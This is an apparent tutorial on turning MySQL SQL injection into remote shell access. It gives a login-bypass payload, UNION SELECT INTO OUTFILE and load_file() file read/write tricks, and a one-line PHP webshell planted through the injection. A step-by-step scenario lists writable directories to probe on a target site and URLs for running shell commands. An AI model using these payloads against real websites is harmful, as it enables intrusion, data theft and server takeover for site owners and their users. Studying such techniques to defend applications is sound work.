SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing SQL query. This attack can succeed whenever a user has submitted data that is not properly validated and is glued together with a legitimate SQL query.
For example, the following SQL command is used to validate user login requests:
$sql_query = "select * from users where user='$user' and password='$pass'"
$sql_query = "select * from users where user='admin' or '1'='1' and password='$pass'"
Using similar techniques, an attacker can retrieve database records, pass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how by applying similar techniques, we will be able to execute arbitrary shell commands.
Command 1- Writing arbitrary files
MySQL has a built-in command that can be used to create and write system files. This command has the following format:
mysq> select "text" INTO OUTFILE "file.txt"
One big drawback of this command is that it can be appended to an existing query using UNION SQL token.
For example, it can be appended to the following query:
select user, password from user where user="admin" and password='123'
select user, password from user where user="admin" and password="123" union select "text",2 into outfile "/tmp/file.txt" -- '
As a result of the above command, the /tmp/file.txt file will be created including the query result.
Command 2- Reading arbitrary files
MySQL has a built-in command that can be used to read arbitrary files. The syntax is very simple. We will use this command for plan B.
mysql> select load_file("PATH_TO_FILE");
Webshell
Webshell is a polpular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that will execute shell commands. Here is the code of a very basic PHP shell (parameter passed by cmd will be executed):
<? system($_REQUEST['cmd']); ?>
For example, in the following screenshot, id command is executed
Webshell - id command
Attack Scenario
1. Find SQL injection
It is out of the scope of this document. You must first find SQL injection.
2. Find a directory with write permission
To create a webshell PHP script, we need a directory with write permission on. Temporary directories used by popular Content Management Systems are a good choice for this. Check the following urls to find one:
hxxp://www.target.com/templates_compiled/
hxxp://www.target.com/templates_c/
hxxp://www.target.com/templates/
hxxp://www.target.com/temporary/
hxxp://www.target.com/images/
hxxp://www.target.com/cache/
hxxp://www.target.com/temp/
hxxp://www.target.com/files/
In our example we will use a temp directory.
3. Exploit SQL injection - create web shell
You need to append the following string to the legitimate SQL command:
UNION SELECT "<? system($_REQUEST['cmd']); ?>",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --
Some explanation:
2,3,4 are just a qualifier that used to make the same number of columns as in the first part of the select query.
/var/www/html is a default web directory in the RedHat-like distributions (Fedora, CentOS).
temp is a directory with full write access. In your case it could be a different directory.
The above command will write the query's result with the"<? system($_REQUEST['cmd']); ?>" string appended. Because we added a php extension to the file name, this string will be treated as a PHP command and will allow us to execute shell commands!
4. Execute shell commands
Now it is the easiest part. Simply open the webserver to execute shell commands. In our example it will be:
hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND
For example:
hxxp://www.target.com/temp/c.php?cmd=id